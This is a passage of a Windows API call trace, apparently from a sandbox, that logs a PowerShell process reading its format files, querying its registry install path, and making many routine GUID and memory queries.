	[0143.875] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.875] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.876] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.876] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.876] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.877] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.877] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.878] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.878] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.878] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0xe67, lpOverlapped=0x0) returned 1
	[0143.878] ReadFile (in: hFile=0x318, lpBuffer=0x3b5927f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b5927f*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.878] ReadFile (in: hFile=0x318, lpBuffer=0x3b59cb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3b59cb0*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.878] SetErrorMode (uMode=0x1) returned 0x1
	[0143.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0143.879] SetErrorMode (uMode=0x1) returned 0x1
	[0143.879] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x318) returned 0x0
	[0143.879] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0143.879] CoTaskMemAlloc (cb=0x5a) returned 0x1b7ad950
	[0143.879] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7ad950, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0143.879] CoTaskMemFree (pv=0x1b7ad950) 
	[0143.879] RegCloseKey (hKey=0x318) returned 0x0
	[0143.883] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xe5e04cde, Data2=0x3c7f, Data3=0x4af0, Data4=([0]=0x89, [1]=0x47, [2]=0x51, [3]=0xbf, [4]=0x23, [5]=0xe5, [6]=0x7a, [7]=0x32))) returned 0x0
	[0143.883] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xcf1081a2, Data2=0x6ae6, Data3=0x46fd, Data4=([0]=0xa4, [1]=0xdb, [2]=0xea, [3]=0x25, [4]=0x10, [5]=0x4c, [6]=0xcd, [7]=0xbe))) returned 0x0
	[0143.883] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf3377f40, Data2=0xf8b5, Data3=0x4747, Data4=([0]=0xb6, [1]=0x7f, [2]=0xf4, [3]=0xce, [4]=0x40, [5]=0x3c, [6]=0x48, [7]=0xeb))) returned 0x0
	[0143.883] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x41eac7a0, Data2=0xa462, Data3=0x41fd, Data4=([0]=0xb2, [1]=0x37, [2]=0xaa, [3]=0x5a, [4]=0x93, [5]=0x6f, [6]=0xaf, [7]=0xf6))) returned 0x0
	[0143.884] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x9a7a2fe6, Data2=0x95e8, Data3=0x4d24, Data4=([0]=0x99, [1]=0x60, [2]=0xac, [3]=0x1c, [4]=0xda, [5]=0x62, [6]=0xd0, [7]=0x6f))) returned 0x0
	[0143.884] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xed376a75, Data2=0x6e1a, Data3=0x4d79, Data4=([0]=0x97, [1]=0x10, [2]=0x97, [3]=0x79, [4]=0xeb, [5]=0xe0, [6]=0xbf, [7]=0x64))) returned 0x0
	[0143.884] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x3baf3f23, Data2=0xa461, Data3=0x4e2a, Data4=([0]=0xb2, [1]=0x15, [2]=0x38, [3]=0xdf, [4]=0x5e, [5]=0xef, [6]=0x3d, [7]=0x23))) returned 0x0
	[0143.884] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.885] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x2a4899a4, Data2=0xafd2, Data3=0x449a, Data4=([0]=0xa1, [1]=0x40, [2]=0xe1, [3]=0x1a, [4]=0x28, [5]=0x6e, [6]=0x42, [7]=0xae))) returned 0x0
	[0143.885] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x15200146, Data2=0x1524, Data3=0x48f9, Data4=([0]=0xa3, [1]=0xf7, [2]=0x75, [3]=0x97, [4]=0x83, [5]=0x2a, [6]=0x4c, [7]=0x4b))) returned 0x0
	[0143.885] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x6c5300ed, Data2=0x52e3, Data3=0x4c11, Data4=([0]=0xb0, [1]=0x79, [2]=0xa3, [3]=0x31, [4]=0xe2, [5]=0xb2, [6]=0xa8, [7]=0x52))) returned 0x0
	[0143.885] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x95922ef, Data2=0x67b, Data3=0x419b, Data4=([0]=0xa3, [1]=0x11, [2]=0xcf, [3]=0xc3, [4]=0x3, [5]=0xe7, [6]=0x6f, [7]=0x97))) returned 0x0
	[0143.885] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x28cd5321, Data2=0xffa1, Data3=0x4248, Data4=([0]=0x94, [1]=0xaa, [2]=0xcd, [3]=0xe5, [4]=0xbc, [5]=0x5f, [6]=0xe6, [7]=0x1f))) returned 0x0
	[0143.886] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf52b4baa, Data2=0x8656, Data3=0x45f5, Data4=([0]=0x8d, [1]=0x72, [2]=0x28, [3]=0x8b, [4]=0x14, [5]=0x46, [6]=0xc5, [7]=0xe2))) returned 0x0
	[0143.886] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x5ae0b035, Data2=0xa954, Data3=0x474c, Data4=([0]=0x99, [1]=0x2d, [2]=0xc6, [3]=0x8a, [4]=0xdc, [5]=0xff, [6]=0x81, [7]=0x8b))) returned 0x0
	[0143.886] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x873aba56, Data2=0x42a0, Data3=0x40b7, Data4=([0]=0x9b, [1]=0xfb, [2]=0xf5, [3]=0xb5, [4]=0x62, [5]=0xd7, [6]=0x38, [7]=0x40))) returned 0x0
	[0143.886] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xee99345a, Data2=0xa0a3, Data3=0x4642, Data4=([0]=0xa3, [1]=0x58, [2]=0x84, [3]=0x9c, [4]=0x4c, [5]=0x56, [6]=0x74, [7]=0xac))) returned 0x0
	[0143.887] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x48cb695f, Data2=0x8e24, Data3=0x4de0, Data4=([0]=0x8e, [1]=0x7b, [2]=0x70, [3]=0xaa, [4]=0x46, [5]=0x7c, [6]=0xe5, [7]=0x7b))) returned 0x0
	[0143.887] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x76fa2938, Data2=0xf706, Data3=0x4191, Data4=([0]=0x90, [1]=0x29, [2]=0xdb, [3]=0x40, [4]=0x82, [5]=0x94, [6]=0x29, [7]=0xf))) returned 0x0
	[0143.887] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x1febb205, Data2=0xa01e, Data3=0x45b6, Data4=([0]=0x9c, [1]=0x6f, [2]=0x4a, [3]=0x31, [4]=0x96, [5]=0x39, [6]=0xcf, [7]=0xdb))) returned 0x0
	[0143.887] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.888] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.888] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.888] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xfd8da7d8, Data2=0xf358, Data3=0x44ce, Data4=([0]=0xa6, [1]=0xbe, [2]=0xa2, [3]=0x20, [4]=0xa1, [5]=0x0, [6]=0xd2, [7]=0xf4))) returned 0x0
	[0143.888] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x1ba1cc62, Data2=0xd6e5, Data3=0x4935, Data4=([0]=0x9c, [1]=0x55, [2]=0x4d, [3]=0x6e, [4]=0x51, [5]=0x9f, [6]=0xe9, [7]=0x6e))) returned 0x0
	[0143.889] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xdd913889, Data2=0x99de, Data3=0x4aa8, Data4=([0]=0x9a, [1]=0x58, [2]=0x95, [3]=0x9e, [4]=0x63, [5]=0x9d, [6]=0x10, [7]=0xb3))) returned 0x0
	[0143.889] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x5b97c2a4, Data2=0x3435, Data3=0x4e54, Data4=([0]=0xbf, [1]=0x25, [2]=0x2e, [3]=0x1, [4]=0xb8, [5]=0xdf, [6]=0x8b, [7]=0x8a))) returned 0x0
	[0143.889] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xae262cfb, Data2=0x7cb8, Data3=0x430a, Data4=([0]=0xa2, [1]=0x35, [2]=0x87, [3]=0x6, [4]=0xc8, [5]=0xcb, [6]=0x94, [7]=0xe6))) returned 0x0
	[0143.889] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xedb2790a, Data2=0x8d58, Data3=0x4f81, Data4=([0]=0xbc, [1]=0x82, [2]=0xdf, [3]=0x9a, [4]=0xe4, [5]=0xb, [6]=0x6f, [7]=0x35))) returned 0x0
	[0143.889] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x76930e96, Data2=0xc380, Data3=0x4a15, Data4=([0]=0x8c, [1]=0xcd, [2]=0xfc, [3]=0x46, [4]=0xd3, [5]=0x1c, [6]=0xd6, [7]=0x54))) returned 0x0
	[0143.890] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xa2793908, Data2=0x9952, Data3=0x44d3, Data4=([0]=0xa5, [1]=0x71, [2]=0xed, [3]=0x77, [4]=0x25, [5]=0x10, [6]=0x66, [7]=0xdc))) returned 0x0
	[0143.890] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x6292fdff, Data2=0x7250, Data3=0x4982, Data4=([0]=0x8c, [1]=0x7, [2]=0xeb, [3]=0x62, [4]=0x75, [5]=0x33, [6]=0xad, [7]=0xc4))) returned 0x0
	[0143.890] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf578c3f8, Data2=0xa015, Data3=0x4f2b, Data4=([0]=0x98, [1]=0x5f, [2]=0x36, [3]=0x87, [4]=0x73, [5]=0x7, [6]=0x88, [7]=0xa4))) returned 0x0
	[0143.890] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xfa7b18e2, Data2=0x9c54, Data3=0x4a1b, Data4=([0]=0xb1, [1]=0x5e, [2]=0x3a, [3]=0x4d, [4]=0x77, [5]=0x3e, [6]=0xaf, [7]=0xa6))) returned 0x0
	[0143.890] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xab726f36, Data2=0xa43c, Data3=0x4ccb, Data4=([0]=0xb0, [1]=0xfa, [2]=0x52, [3]=0x5, [4]=0x6c, [5]=0xbb, [6]=0x21, [7]=0x26))) returned 0x0
	[0143.891] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x19f22cb7, Data2=0xdca8, Data3=0x4885, Data4=([0]=0xa3, [1]=0xe7, [2]=0x58, [3]=0xe2, [4]=0xb2, [5]=0xb7, [6]=0x4d, [7]=0x5f))) returned 0x0
	[0143.891] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.891] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xbb432912, Data2=0x57c, Data3=0x43cb, Data4=([0]=0xa3, [1]=0xd4, [2]=0xf8, [3]=0x1c, [4]=0x4e, [5]=0x64, [6]=0x14, [7]=0xf6))) returned 0x0
	[0143.891] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.893] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.894] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xa6cc3447, Data2=0x1bdd, Data3=0x44b3, Data4=([0]=0x86, [1]=0x6a, [2]=0xef, [3]=0x2d, [4]=0x23, [5]=0xf3, [6]=0x79, [7]=0xd2))) returned 0x0
	[0143.895] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.895] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xcba1fcea, Data2=0x9e28, Data3=0x4a0e, Data4=([0]=0x89, [1]=0x58, [2]=0x35, [3]=0xc1, [4]=0xab, [5]=0xa1, [6]=0x5c, [7]=0x2f))) returned 0x0
	[0143.895] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x99c3f66c, Data2=0xaf9f, Data3=0x4172, Data4=([0]=0xa7, [1]=0x91, [2]=0x42, [3]=0x2f, [4]=0xe0, [5]=0xb8, [6]=0xd6, [7]=0x7b))) returned 0x0
	[0143.896] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x325c85c1, Data2=0x4504, Data3=0x42f1, Data4=([0]=0x83, [1]=0xe9, [2]=0xf4, [3]=0x7f, [4]=0xe8, [5]=0x54, [6]=0xdd, [7]=0xa8))) returned 0x0
	[0143.896] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x882998c2, Data2=0xa6ce, Data3=0x4d57, Data4=([0]=0x99, [1]=0x94, [2]=0x59, [3]=0xcc, [4]=0xaa, [5]=0x73, [6]=0xb6, [7]=0xb1))) returned 0x0
	[0143.896] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x9270e538, Data2=0xd004, Data3=0x4852, Data4=([0]=0x96, [1]=0xb1, [2]=0x5a, [3]=0x87, [4]=0x54, [5]=0xa9, [6]=0x5, [7]=0xec))) returned 0x0
	[0143.896] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x67bb3597, Data2=0xb38, Data3=0x439a, Data4=([0]=0x99, [1]=0xe4, [2]=0x7b, [3]=0xa7, [4]=0x57, [5]=0xe0, [6]=0x70, [7]=0x6e))) returned 0x0
	[0143.897] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb0811549, Data2=0xf2c6, Data3=0x453d, Data4=([0]=0xa8, [1]=0xc2, [2]=0xd9, [3]=0x16, [4]=0x87, [5]=0x96, [6]=0x1b, [7]=0xa0))) returned 0x0
	[0143.897] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.897] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xd82e9b35, Data2=0x5a79, Data3=0x4baf, Data4=([0]=0x80, [1]=0xab, [2]=0xb0, [3]=0x15, [4]=0xae, [5]=0xce, [6]=0xf3, [7]=0xdc))) returned 0x0
	[0143.898] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x8d39d0b, Data2=0xb17b, Data3=0x47f5, Data4=([0]=0xb6, [1]=0xae, [2]=0xf3, [3]=0x7f, [4]=0xc7, [5]=0x36, [6]=0x85, [7]=0x17))) returned 0x0
	[0143.898] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x7a2ad45e, Data2=0x3e32, Data3=0x4e69, Data4=([0]=0xae, [1]=0x81, [2]=0x35, [3]=0x37, [4]=0x77, [5]=0x43, [6]=0x7d, [7]=0xc1))) returned 0x0
	[0143.898] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xc39ad5fb, Data2=0x8ad7, Data3=0x4238, Data4=([0]=0xac, [1]=0x9d, [2]=0x52, [3]=0x12, [4]=0x16, [5]=0x32, [6]=0x41, [7]=0x7))) returned 0x0
	[0143.898] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x6a60d25f, Data2=0x7959, Data3=0x4e3c, Data4=([0]=0xa1, [1]=0xc4, [2]=0x58, [3]=0x28, [4]=0xd2, [5]=0x35, [6]=0xa0, [7]=0xef))) returned 0x0
	[0143.898] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.899] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x3addd1cc, Data2=0xa369, Data3=0x46a3, Data4=([0]=0x86, [1]=0x1d, [2]=0x7e, [3]=0x3, [4]=0x73, [5]=0x61, [6]=0x67, [7]=0x67))) returned 0x0
	[0143.899] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xde965f8a, Data2=0x5511, Data3=0x4602, Data4=([0]=0x81, [1]=0x16, [2]=0x1b, [3]=0x7c, [4]=0x89, [5]=0x8e, [6]=0x97, [7]=0x33))) returned 0x0
	[0143.899] VirtualQuery (in: lpAddress=0x14bbf0, lpBuffer=0x14cab0, dwLength=0x30 | out: lpBuffer=0x14cab0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.899] VirtualQuery (in: lpAddress=0x14bbf0, lpBuffer=0x14cab0, dwLength=0x30 | out: lpBuffer=0x14cab0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.899] VirtualQuery (in: lpAddress=0x14bbf0, lpBuffer=0x14cab0, dwLength=0x30 | out: lpBuffer=0x14cab0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.900] VirtualQuery (in: lpAddress=0x14bbf0, lpBuffer=0x14cab0, dwLength=0x30 | out: lpBuffer=0x14cab0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.900] SetErrorMode (uMode=0x1) returned 0x1
	[0143.900] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0143.900] SetErrorMode (uMode=0x1) returned 0x1
	[0143.900] GetFileType (hFile=0x318) returned 0x1
	[0143.901] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7c48*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.902] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7c48*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.902] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7c48*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.902] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7c48*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.903] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7c48*, lpNumberOfBytesRead=0x14cf18*=0x8b4, lpOverlapped=0x0) returned 1
	[0143.903] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7064, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7064*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.903] ReadFile (in: hFile=0x318, lpBuffer=0x3cb7c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cb7c48*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.903] SetErrorMode (uMode=0x1) returned 0x1
	[0143.903] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0143.903] SetErrorMode (uMode=0x1) returned 0x1
	[0143.904] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x318) returned 0x0
	[0143.904] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0143.904] CoTaskMemAlloc (cb=0x5a) returned 0x1b7ad950
